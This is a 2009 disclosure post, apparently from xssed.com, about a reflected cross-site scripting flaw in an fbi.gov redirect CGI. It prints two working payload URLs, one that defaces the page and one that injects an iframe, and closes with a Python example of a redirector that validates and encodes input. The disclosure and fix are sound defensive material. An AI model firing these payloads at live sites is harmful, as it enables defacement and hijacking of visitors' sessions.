FBI.gov xssed!

Written by KF

Friday, 9 January 2009

Ok, it is not the first time, but they had fixed all the previous ones. This will probably be the third or fourth time they try to address this damn cgi! Here is the XSS that Babaconda submitted to us (it works only in Internet Explorer):
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'babaconda'</script>

For the iframe fans, here's one:
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.fbi.gov/</script><script/defer>document.body.innerHTML='<iframe/src=http://xssed.com>'</script>

Here is the mirror:
http://www.xssed.com/mirror/46852/

Have a look at the previous XSS issues affecting *.fbi.gov:
http://www.xssed.com/archive/domain=fbi.gov
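The root cause shown by both URLs is a redirector that echoes its raw query string into a script block, so a destination containing `</script>` terminates the block. As an added illustration (not code from xssed.com or from the FBI's outside.cgi), the hypothetical `render_outside_page()` below is a stand-in for such a redirector that validates the destination and then encodes it for each output context, fed with the query from the first URL above; the scheme check alone does not stop that query, the context-aware encoding does.

```python
import json
import html
from typing import Optional
from urllib.parse import urlsplit

# Query-string part of the first URL in the post (the destination is passed as the raw
# query, outside.cgi?<url>); used here as the test input for the renderer.
PAYLOAD_FROM_POST = (
    "http://www.google.com/</script><script/defer>document.body.innerHTML="
    "'xssed'+unescape('%20')+'by'+unescape('%20')+'babaconda'</script>"
)

ALLOWED_SCHEMES = {"http", "https"}


def js_string_literal(value: str) -> str:
    """Encode value as a JS string literal that cannot close the enclosing <script>."""
    s = json.dumps(value)
    # json.dumps leaves '<', '>' and '&' untouched, so a literal '</script>' inside the
    # string would still end the script element; \u escapes are valid inside JS strings.
    return s.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def validate_destination(raw: str) -> Optional[str]:
    """Accept only absolute http(s) URLs; rejects javascript:, data: and relative input."""
    parts = urlsplit(raw)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return raw


def render_outside_page(raw_query: str) -> str:
    """Hypothetical redirector page: attribute, text and script contexts each get their own encoding."""
    dest = validate_destination(raw_query)
    if dest is None:
        return "<html><body><p>Invalid destination.</p></body></html>"
    return (
        "<html><body>"
        f'<p>You are leaving this site: <a href="{html.escape(dest, quote=True)}">'
        f"{html.escape(dest)}</a></p>"
        f"<script>var dest = {js_string_literal(dest)}; "
        "setTimeout(function () { window.location = dest; }, 3000);</script>"
        "</body></html>"
    )


if __name__ == "__main__":
    print(render_outside_page(PAYLOAD_FROM_POST))
```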
